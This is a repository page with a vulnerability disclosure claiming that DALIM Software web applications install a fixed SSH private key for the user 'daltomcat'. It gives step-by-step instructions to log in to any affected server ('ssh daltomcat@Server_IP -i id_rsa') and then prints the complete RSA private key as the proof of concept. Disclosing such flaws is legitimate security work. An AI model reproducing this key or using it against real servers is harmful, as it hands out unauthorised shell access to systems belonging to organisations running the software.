Skip to content

Latest commit

 

History

History

DALIM-Software-web-applications_server

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 
dal_exploit.png
dal_exploit.png
 
 
id_rsa
id_rsa
 
 

README.md

Pre-defined SSH Private key for user daltomcat

Summery

The DALIM Software web applications software stack ships with pre-defined SSH private key for user daltomcat

When this software stack is installed on a Linux server, it creates a Linux user with below mentioned configuration (in /etc/passwd file):

daltomcat:x:****:****:DALiM Tomcat Admin:/home/daltomcat:/bin/bash

Abuse case

An attacker can SSH as user daltomcat to a Linux server in which DALIM Software web applications software stack is installed.

To exploit the issue, save below mentioned SSH private key to your machine, chmod it's permission to 400 and SSH to target machine using below menitoned command:

ssh daltomcat@Server_IP -i id_rsa

POC

SSH private key content

Below mentioned is the SSH private key for user account daltomcat:

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEA28TZ+bYr2OIn4apSrM6Q9qPhWgkOokwyD/VadnMIordEX8he
36wLJFGyIzg7kWc/zbJ89CutJl6bteC0Tzv6bxl9wCNs1rEpW/eR4wDQRhUpc+pQ
KlSIhfJa0NOwlgFhol7CR+Hk/9H87pUlNh7vcY7sNH9uRG+CPdX9yuJKP1NZucF2
FKNaU2PhytlJl7/xJGsy69wsMFMxEfKhtZgTZN5sK+RbzNxuvJgwj3DmXusalksO
rpPf1DufqfRT2UvccdwyMh7Gun4CHU7TM8b4hkQO9NmOHI3GvSLcEtJv1lMQ7fLT
/1ocfR3BjVuB24gmGL54ODn+v9Dv7TI9sCay2QIBIwKCAQBLWW9OTRZY/RT86fB1
wypjMN+MlWQaY0RdPi2k9D15neuOjddioWLn4X7ngP56/tQMAq5/mfI5Cn6HgD3S
Be92jGWg9jPx1ldSu0f2DuhSiumkFdJXp/RLLoWJbSaZ1JaA0AgYpTiSOV4IqCoD
7Vlow0mrmWeib1/ar8S6lrpe2hzd5VrhmjuXd/S4t/P6yczfyjxU7wAqMPVJ5wJ9
XSWBaWwXnCt4FoLRIrFZeJzFvYLea+j0esYCd1uSe1e8wDQXlCjNENE28dgZWYKh
WJLTtvi80YaJeHLKUix4ZiNzf3oOW6SvScQsMKKBRbhXJz3ohk6F+Xlxei9Umhp0
k9WLAoGBAPgRo+8gOcbB+VjKvFGYJb1UupgZWC+lSVDNSZrLChypfSuYMjFGa4qv
UzzeRnLL8/CawuLuDjK9hsxndGx0/WUawCe1CYmlGJXgFNOe9tIN8yxVsA8axy6+
GWh0Vb96XsusrEFqCIi0JcS0dWV5xq9KvocuEwuGvQfDGZ2EBudpAoGBAOLLleiN
EmXCTKnlWcW5eEjtosAwIDwP+xTXxz+nk56smG/5gAES2eaAn8PBiqpSORbyzW73
dOuPg12B7XzTHd9nq+jRpDA1JAtIn5fo4yTkJeJ4cQvw0fPbmcc/Usj1wHaXZfJA
umzyv3g1MBgOOaznzYwDZKZYxN4eAdMCxfHxAoGAHFnJl6vpWIsycIwyx38aQYYG
skwKFBLjzrhgLvKiEed8BPtzc1iBUa2jHOYz79zLa/RuC05oBcyEbyHEKab4Y1OD
rMQ7mrPIS6SUqniRPJPhRuU4sUTjkFA9awX7K9N4jE4/knKEoeiz2/dd37YlVdyo
D3L63L7xCDON5h23pWsCgYEAz1sMt1xol40S5HnrrXZfWJ7Ar7b45nUC0TpPxSt/
pwQzmZOoO37zG+NQPfLH7C3rDarKdBVyNnSVXM6P/RjK2uJxSeQ+V/YSU3WZOm6G
iCEMsc00KCyisxHrrtrPWKYsTytV5M13PwnToRqvoPcQKQ5yySesetTRQBtvYdam
WYsCgYEAkuxFor2DGF05bUSLgLKFj2hJ7ZQwkxIXOU/MKt52spL+KHGc/LuCq9Jv
y43P5UdThFyuS10NBe7iHmbaoLEaRxlO9M38vMIldHDm2nAeQ5AwVVeSEWoSsm2O
0Waof8fgaW21AMhqudoU1pAvfBNGah7SiKqP/yXjaceWTpSALb0=
-----END RSA PRIVATE KEY-----